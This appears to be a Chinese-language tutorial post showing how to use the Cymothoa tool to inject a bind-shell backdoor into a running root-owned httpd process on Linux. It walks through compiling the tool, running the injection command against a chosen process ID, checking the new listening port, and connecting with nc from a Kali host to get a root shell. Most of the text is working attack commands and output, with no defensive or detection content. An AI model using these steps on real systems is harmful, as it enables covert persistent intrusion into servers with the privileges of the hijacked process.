cymothoa进程注入后门

下载:https://sourceforge.net/projects/cymothoa/files/
测试环境:
32位环境下可以编译成功

[root@localhost cymothoa-1-alpha]# uname -a
Linux localhost.localdomain 2.6.18-194.el5 #1 SMP Fri Apr 2 14:58:35 EDT 2010 i686 i686 i386 GNU/Linux

64位环境下编译报错
后门注入到的进程,只要有权限就行,然后反弹的也就是进程相应的权限,当然进程重启或者挂了也就没了

[root@localhost cymothoa-1-alpha]# make
cc cymothoa.c -o cymothoa -Dlinux_x86
[root@localhost cymothoa-1-alpha]# ps axu | grep httpd | grep root | grep -v grep 
root 14988 0.0 0.2 10068 2900 ? Ss 05:38 0:00 /usr/sbin/httpd
[root@localhost cymothoa-1-alpha]# ./cymothoa -p 14988 -s 0 -y 8888 //14988为要注入进程的进程号
[+] attaching to process 14988

 register info: 
 -----------------------------------------------------------
 eax value: 0xfffffdfe ebx value: 0x0
 esp value: 0xbfd121bc eip value: 0x6ed402
 ------------------------------------------------------------

[+] new esp: 0xbfd121b8
[+] injecting code into 0x00d27000
[+] copy general purpose registers
[+] detaching from 14988

[+] infected!!!

比如注入到httpd进程中,然后nc连接

[root@localhost cymothoa-1-alpha]# netstat -antlp | grep 8888
tcp 0 0 0.0.0.0:8888 0.0.0.0:* LISTEN 15036/httpd 
root@kali-vincent:~# nc -vv 172.16.100.156 8888
172.16.100.156: inverse host lookup failed: Unknown host
(UNKNOWN) [172.16.100.156] 8888 (?) open
whoami
root